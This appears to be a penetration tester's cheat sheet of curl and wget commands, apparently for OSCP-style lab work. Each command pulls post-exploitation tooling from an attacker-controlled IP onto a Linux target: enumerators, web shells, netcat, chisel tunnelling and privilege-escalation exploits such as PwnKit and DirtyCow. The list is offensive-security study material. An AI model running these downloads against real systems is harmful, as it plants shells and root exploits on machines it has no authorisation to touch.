x

Linux File Transfers & Shells

Enumerators
Use for initial checks 

curl http://192.168.49.93:80/Linux/linpeas.sh -o linpeas.sh

Use for more methodical checks. Run with increasing levels 

curl http://192.168.49.93:80/Linux/lse.sh -o lse.sh

Run third, may catch something the others didn't 

curl http://192.168.45.231:9090/Linux/linenum.sh -o linenum.sh

Last resort 

curl http://192.168.45.180:1337/Linux/beroot.zip -o beroot.zip

Shells 

curl http://192.168.45.159:1337/Linux/p0wnyshell.php -o pownyshell.php

curl http://192.168.45.159:1337/Linux/rootbash.sh -o rootbash.sh

curl http://192.168.45.191:1337/Linux/nc -o nc

curl http://192.168.45.180:1337/Linux/phpshell.php -o phpshell.php

curl http://192.168.45.231:21/Linux/shell.js -o shell.js

curl http://192.168.49.93:80/Linux/chisel -o chisel

Port Forwarding 

curl http://192.168.45.191:1337/Linux/chisel -o chisel

curl http://192.168.45.180:1337/Linux/agent -o agent

CRON Job checking 

curl http://192.168.49.93:80/Linux/pspy64 -o pspy64

curl http://192.168.45.199:1337/Linux/pspy32 -o pspy32

Kernels - note that it's preferable to run a more exact kernel exploit on OSCP 

curl http://192.168.45.227:1337/Linux/PwnKit/PwnKit -o PwnKit

curl http://192.168.45.231:80/Linux/PwnKit/PwnKit.c -o PwnKit.c

curl http://10.10.14.22:1337/Linux/PwnKit/PwnKit.sh -o PwnKit.sh

curl http://10.10.14.22:1337/Linux/dirty.c -o dirty.c

Optional enumerators, likely not needed 

curl http://192.168.45.241:1337/Linux/unix-privesc-check -o unix-privesc-check

curl http://192.168.45.180:1337/Linux/linuxprivchecker.py -o linuxprivchecker.py 

curl http://192.168.45.180:1337/Linux/linuxprivchecker.sh -o linuxprivchecker.sh

curl http://192.168.45.159:1337/Linux/baron-samedit/exploit_nss.py -o nss.py

curl http://192.168.45.159:1337/Linux/baron-samedit/exploit_userspec.py -o uspec.py

curl http://192.168.45.159:1337/Linux/baron-samedit/exploit_defaults_mailer.py -o mailer.py

Wget

wget http://192.168.45.225:1337/Linux/linpeas.sh -O linpeas.sh

wget http://192.168.45.199:1337/Linux/PwnKit/PwnKit -O PwnKit

wget http://10.10.14.22:1337/Linux/PwnKit/PwnKit.sh -O PwnKit.sh

wget http://192.168.45.199:1337/Linux/PwnKit/PwnKit.c -O PwnKit.c

wget http://192.168.45.159:1337/Linux/lse.sh -O lse.sh

wget http://192.168.45.199:1337/Linux/pspy64 -O pspy64

wget http://192.168.45.199:1337/Linux/pspy32 -O pspy32

wget http://192.168.45.197:1337/Linux/p0wnyshell.php -O pownyshell.php

wget http://192.168.45.162:1337/Linux/dirty.c -O dirty.c

wget http://192.168.45.159:1337/Linux/dirtycowroot.c -O dirtycowroot.c

wget http://192.168.45.186:1337/Linux/linuxprivchecker.sh -O linuxprivchecker.sh

wget http://192.168.45.159:1337/Linux/chocobo.c -O chocobo.c
Left-click: follow link, Right-click: select node, Scroll: zoom
x